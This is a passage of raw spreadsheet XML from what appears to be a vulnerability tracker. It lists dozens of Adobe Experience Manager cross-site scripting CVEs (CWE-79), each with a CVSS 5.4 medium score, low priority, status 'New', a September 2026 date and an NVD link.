t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t></is></c></row><row r="2051"><c r="A2051" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2051" s="5" t="inlineStr"><is><t>CVE-2026-75674</t></is></c><c r="D2051" s="5" t="n"><v>5.4</v></c><c r="E2051" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2051" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2051" s="5" t="inlineStr" /><c r="H2051" s="5" t="n"><v>0.003</v></c><c r="I2051" s="5" t="inlineStr" /><c r="J2051" s="5" t="inlineStr" /><c r="K2051" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2051" s="5" t="inlineStr" /><c r="M2051" s="5" t="inlineStr" /><c r="N2051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2051" s="5" t="inlineStr" /><c r="Q2051" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t></is></c></row><row r="2052"><c r="A2052" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2052" s="5" t="inlineStr"><is><t>CVE-2026-75675</t></is></c><c r="D2052" s="5" t="n"><v>5.4</v></c><c r="E2052" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2052" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2052" s="5" t="inlineStr" /><c r="H2052" s="5" t="n"><v>0.003</v></c><c r="I2052" s="5" t="inlineStr" /><c r="J2052" s="5" t="inlineStr" /><c r="K2052" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2052" s="5" t="inlineStr" /><c r="M2052" s="5" t="inlineStr" /><c r="N2052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2052" s="5" t="inlineStr" /><c r="Q2052" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t></is></c></row><row r="2053"><c r="A2053" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2053" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2053" s="5" t="inlineStr"><is><t>CVE-2026-75677</t></is></c><c r="D2053" s="5" t="n"><v>5.4</v></c><c r="E2053" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2053" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2053" s="5" t="inlineStr" /><c r="H2053" s="5" t="n"><v>0.003</v></c><c r="I2053" s="5" t="inlineStr" /><c r="J2053" s="5" t="inlineStr" /><c r="K2053" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2053" s="5" t="inlineStr" /><c r="M2053" s="5" t="inlineStr" /><c r="N2053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2053" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2053" s="5" t="inlineStr" /><c r="Q2053" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t></is></c></row><row r="2054"><c r="A2054" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2054" s="5" t="inlineStr"><is><t>CVE-2026-75678</t></is></c><c r="D2054" s="5" t="n"><v>5.4</v></c><c r="E2054" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2054" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2054" s="5" t="inlineStr" /><c r="H2054" s="5" t="n"><v>0.003</v></c><c r="I2054" s="5" t="inlineStr" /><c r="J2054" s="5" t="inlineStr" /><c r="K2054" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2054" s="5" t="inlineStr" /><c r="M2054" s="5" t="inlineStr" /><c r="N2054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2054" s="5" t="inlineStr" /><c r="Q2054" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t></is></c></row><row r="2055"><c r="A2055" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2055" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2055" s="5" t="inlineStr"><is><t>CVE-2026-75679</t></is></c><c r="D2055" s="5" t="n"><v>5.4</v></c><c r="E2055" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2055" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2055" s="5" t="inlineStr" /><c r="H2055" s="5" t="n"><v>0.003</v></c><c r="I2055" s="5" t="inlineStr" /><c r="J2055" s="5" t="inlineStr" /><c r="K2055" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2055" s="5" t="inlineStr" /><c r="M2055" s="5" t="inlineStr" /><c r="N2055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2055" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2055" s="5" t="inlineStr" /><c r="Q2055" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t></is></c></row><row r="2056"><c r="A2056" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2056" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2056" s="5" t="inlineStr"><is><t>CVE-2026-75680</t></is></c><c r="D2056" s="5" t="n"><v>5.4</v></c><c r="E2056" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2056" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2056" s="5" t="inlineStr" /><c r="H2056" s="5" t="n"><v>0.003</v></c><c r="I2056" s="5" t="inlineStr" /><c r="J2056" s="5" t="inlineStr" /><c r="K2056" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2056" s="5" t="inlineStr" /><c r="M2056" s="5" t="inlineStr" /><c r="N2056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2056" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2056" s="5" t="inlineStr" /><c r="Q2056" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t></is></c></row><row r="2057"><c r="A2057" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2057" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2057" s="5" t="inlineStr"><is><t>CVE-2026-75681</t></is></c><c r="D2057" s="5" t="n"><v>5.4</v></c><c r="E2057" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2057" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2057" s="5" t="inlineStr" /><c r="H2057" s="5" t="n"><v>0.003</v></c><c r="I2057" s="5" t="inlineStr" /><c r="J2057" s="5" t="inlineStr" /><c r="K2057" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2057" s="5" t="inlineStr" /><c r="M2057" s="5" t="inlineStr" /><c r="N2057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2057" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2057" s="5" t="inlineStr" /><c r="Q2057" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t></is></c></row><row r="2058"><c r="A2058" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2058" s="5" t="inlineStr"><is><t>CVE-2026-75683</t></is></c><c r="D2058" s="5" t="n"><v>5.4</v></c><c r="E2058" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2058" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2058" s="5" t="inlineStr" /><c r="H2058" s="5" t="n"><v>0.003</v></c><c r="I2058" s="5" t="inlineStr" /><c r="J2058" s="5" t="inlineStr" /><c r="K2058" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2058" s="5" t="inlineStr" /><c r="M2058" s="5" t="inlineStr" /><c r="N2058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2058" s="5" t="inlineStr" /><c r="Q2058" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t></is></c></row><row r="2059"><c r="A2059" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2059" s="5" t="inlineStr"><is><t>CVE-2026-75685</t></is></c><c r="D2059" s="5" t="n"><v>5.4</v></c><c r="E2059" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2059" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2059" s="5" t="inlineStr" /><c r="H2059" s="5" t="n"><v>0.003</v></c><c r="I2059" s="5" t="inlineStr" /><c r="J2059" s="5" t="inlineStr" /><c r="K2059" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2059" s="5" t="inlineStr" /><c r="M2059" s="5" t="inlineStr" /><c r="N2059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2059" s="5" t="inlineStr" /><c r="Q2059" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t></is></c></row><row r="2060"><c r="A2060" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2060" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2060" s="5" t="inlineStr"><is><t>CVE-2026-75687</t></is></c><c r="D2060" s="5" t="n"><v>5.4</v></c><c r="E2060" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2060" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2060" s="5" t="inlineStr" /><c r="H2060" s="5" t="n"><v>0.003</v></c><c r="I2060" s="5" t="inlineStr" /><c r="J2060" s="5" t="inlineStr" /><c r="K2060" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2060" s="5" t="inlineStr" /><c r="M2060" s="5" t="inlineStr" /><c r="N2060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2060" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2060" s="5" t="inlineStr" /><c r="Q2060" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t></is></c></row><row r="2061"><c r="A2061" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2061" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2061" s="5" t="inlineStr"><is><t>CVE-2026-75690</t></is></c><c r="D2061" s="5" t="n"><v>5.4</v></c><c r="E2061" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2061" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2061" s="5" t="inlineStr" /><c r="H2061" s="5" t="n"><v>0.003</v></c><c r="I2061" s="5" t="inlineStr" /><c r="J2061" s="5" t="inlineStr" /><c r="K2061" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2061" s="5" t="inlineStr" /><c r="M2061" s="5" t="inlineStr" /><c r="N2061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2061" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2061" s="5" t="inlineStr" /><c r="Q2061" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t></is></c></row><row r="2062"><c r="A2062" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2062" s="5" t="inlineStr"><is><t>CVE-2026-75691</t></is></c><c r="D2062" s="5" t="n"><v>5.4</v></c><c r="E2062" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2062" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2062" s="5" t="inlineStr" /><c r="H2062" s="5" t="n"><v>0.003</v></c><c r="I2062" s="5" t="inlineStr" /><c r="J2062" s="5" t="inlineStr" /><c r="K2062" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2062" s="5" t="inlineStr" /><c r="M2062" s="5" t="inlineStr" /><c r="N2062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2062" s="5" t="inlineStr" /><c r="Q2062" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t></is></c></row><row r="2063"><c r="A2063" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2063" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2063" s="5" t="inlineStr"><is><t>CVE-2026-75692</t></is></c><c r="D2063" s="5" t="n"><v>5.4</v></c><c r="E2063" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2063" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2063" s="5" t="inlineStr" /><c r="H2063" s="5" t="n"><v>0.003</v></c><c r="I2063" s="5" t="inlineStr" /><c r="J2063" s="5" t="inlineStr" /><c r="K2063" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2063" s="5" t="inlineStr" /><c r="M2063" s="5" t="inlineStr" /><c r="N2063" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2063" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2063" s="5" t="inlineStr" /><c r="Q2063" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t></is></c></row><row r="2064"><c r="A2064" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2064" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2064" s="5" t="inlineStr"><is><t>CVE-2026-75693</t></is></c><c r="D2064" s="5" t="n"><v>5.4</v></c><c r="E2064" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2064" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2064" s="5" t="inlineStr" /><c r="H2064" s="5" t="n"><v>0.003</v></c><c r="I2064" s="5" t="inlineStr" /><c r="J2064" s="5" t="inlineStr" /><c r="K2064" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2064" s="5" t="inlineStr" /><c r="M2064" s="5" t="inlineStr" /><c r="N2064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2064" s="5" t="inlineStr" /><c r="Q2064" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t></is></c></row><row r="2065"><c r="A2065" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2065" s="5" t="inlineStr"><is><t>CVE-2026-75694</t></is></c><c r="D2065" s="5" t="n"><v>5.4</v></c><c r="E2065" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2065" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2065" s="5" t="inlineStr" /><c r="H2065" s="5" t="n"><v>0.003</v></c><c r="I2065" s="5" t="inlineStr" /><c r="J2065" s="5" t="inlineStr" /><c r="K2065" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2065" s="5" t="inlineStr" /><c r="M2065" s="5" t="inlineStr" /><c r="N2065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2065" s="5" t="inlineStr" /><c r="Q2065" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t></is></c></row><row r="2066"><c r="A2066" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2066" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2066" s="5" t="inlineStr"><is><t>CVE-2026-75695</t></is></c><c r="D2066" s="5" t="n"><v>5.4</v></c><c r="E2066" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2066" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2066" s="5" t="inlineStr" /><c r="H2066" s="5" t="n"><v>0.003</v></c><c r="I2066" s="5" t="inlineStr" /><c r="J2066" s="5" t="inlineStr" /><c r="K2066" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2066" s="5" t="inlineStr" /><c r="M2066" s="5" t="inlineStr" /><c r="N2066" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2066" s="5" t="inlineStr" /><c r="Q2066" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t></is></c></row><row r="2067"><c r="A2067" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2067" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2067" s="5" t="inlineStr"><is><t>CVE-2026-75696</t></is></c><c r="D2067" s="5" t="n"><v>5.4</v></c><c r="E2067" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2067" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2067" s="5" t="inlineStr" /><c r="H2067" s="5" t="n"><v>0.003</v></c><c r="I2067" s="5" t="inlineStr" /><c r="J2067" s="5" t="inlineStr" /><c r="K2067" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2067" s="5" t="inlineStr" /><c r="M2067" s="5" t="inlineStr" /><c r="N2067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2067" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2067" s="5" t="inlineStr" /><c r="Q2067" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t></is></c></row><row r="2068"><c r="A2068" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2068" s="5" t="inlineStr"><is><t>CVE-2026-75700</t></is></c><c r="D2068" s="5" t="n"><v>5.4</v></c><c r="E2068" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2068" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2068" s="5" t="inlineStr" /><c r="H2068" s="5" t="n"><v>0.003</v></c><c r="I2068" s="5" t="inlineStr" /><c r="J2068" s="5" t="inlineStr" /><c r="K2068" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2068" s="5" t="inlineStr" /><c r="M2068" s="5" t="inlineStr" /><c r="N2068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2068" s="5" t="inlineStr" /><c r="Q2068" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t></is></c></row><row r="2069"><c r="A2069" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2069" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2069" s="5" t="inlineStr"><is><t>CVE-2026-75701</t></is></c><c r="D2069" s="5" t="n"><v>5.4</v></c><c r="E2069" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2069" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2069" s="5" t="inlineStr" /><c r="H2069" s="5" t="n"><v>0.003</v></c><c r="I2069" s="5" t="inlineStr" /><c r="J2069" s="5" t="inlineStr" /><c r="K2069" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2069" s="5" t="inlineStr" /><c r="M2069" s="5" t="inlineStr" /><c r="N2069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2069" s="5" t="inlineStr" /><c r="Q2069" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R206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69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t></is></c></row><row r="2070"><c r="A2070" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2070" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2070" s="5" t="inlineStr"><is><t>CVE-2026-75702</t></is></c><c r="D2070" s="5" t="n"><v>5.4</v></c><c r="E2070" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2070" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2070" s="5" t="inlineStr" /><c r="H2070" s="5" t="n"><v>0.003</v></c><c r="I2070" s="5" t="inlineStr" /><c r="J2070" s="5" t="inlineStr" /><c r="K2070" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2070" s="5" t="inlineStr" /><c r="M2070" s="5" t="inlineStr" /><c r="N2070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2070" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2070" s="5" t="inlineStr" /><c r="Q2070" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t></is></c></row><row r="2071"><c r="A2071" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2071" s="5" t="inlineStr"><is><t>CVE-2026-75704</t></is></c><c r="D2071" s="5" t="n"><v>5.4</v></c><c r="E2071" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2071" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2071" s="5" t="inlineStr" /><c r="H2071" s="5" t="n"><v>0.003</v></c><c r="I2071" s="5" t="inlineStr" /><c r="J2071" s="5" t="inlineStr" /><c r="K2071" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2071" s="5" t="inlineStr" /><c r="M2071" s="5" t="inlineStr" /><c r="N2071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2071" s="5" t="inlineStr" /><c r="Q2071" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t></is></c></row><row r="2072"><c r="A2072" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2072" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2072" s="5" t="inlineStr"><is><t>CVE-2026-75705</t></is></c><c r="D2072" s="5" t="n"><v>5.4</v></c><c r="E2072" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2072" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2072" s="5" t="inlineStr" /><c r="H2072" s="5" t="n"><v>0.003</v></c><c r="I2072" s="5" t="inlineStr" /><c r="J2072" s="5" t="inlineStr" /><c r="K2072" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2072" s="5" t="inlineStr" /><c r="M2072" s="5" t="inlineStr" /><c r="N2072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2072" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2072" s="5" t="inlineStr" /><c r="Q2072" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t></is></c></row><row r="2073"><c r="A2073" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2073" s="5" t="inlineStr"><is><t>CVE-2026-75706</t></is></c><c r="D2073" s="5" t="n"><v>5.4</v></c><c r="E2073" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2073" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2073" s="5" t="inlineStr" /><c r="H2073" s="5" t="n"><v>0.003</v></c><c r="I2073" s="5" t="inlineStr" /><c r="J2073" s="5" t="inlineStr" /><c r="K2073" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2073" s="5" t="inlineStr" /><c r="M2073" s="5" t="inlineStr" /><c r="N2073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2073" s="5" t="inlineStr" /><c r="Q2073" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t></is></c></row><row r="2074"><c r="A2074" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2074" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2074" s="5" t="inlineStr"><is><t>CVE-2026-75707</t></is></c><c r="D2074" s="5" t="n"><v>5.4</v></c><c r="E2074" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2074" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2074" s="5" t="inlineStr" /><c r="H2074" s="5" t="n"><v>0.003</v></c><c r="I2074" s="5" t="inlineStr" /><c r="J2074" s="5" t="inlineStr" /><c r="K2074" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2074" s="5" t="inlineStr" /><c r="M2074" s="5" t="inlineStr" /><c r="N2074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2074" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2074" s="5" t="inlineStr" /><c r="Q2074" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t></is></c></row><row r="2075"><c r="A2075" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2075" s="5" t="inlineStr"><is><t>CVE-2026-75708</t></is></c><c r="D2075" s="5" t="n"><v>5.4</v></c><c r="E2075" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2075" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2075" s="5" t="inlineStr" /><c r="H2075" s="5" t="n"><v>0.003</v></c><c r="I2075" s="5" t="inlineStr" /><c r="J2075" s="5" t="inlineStr" /><c r="K2075" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2075" s="5" t="inlineStr" /><c r="M2075" s="5" t="inlineStr" /><c r="N2075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2075" s="5" t="inlineStr" /><c r="Q2075" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t></is></c></row><row r="2076"><c r="A2076" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2076" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2076" s="5" t="inlineStr"><is><t>CVE-2026-75709</t></is></c><c r="D2076" s="5" t="n"><v>5.4</v></c><c r="E2076" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2076" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2076" s="5" t="inlineStr" /><c r="H2076" s="5" t="n"><v>0.003</v></c><c r="I2076" s="5" t="inlineStr" /><c r="J2076" 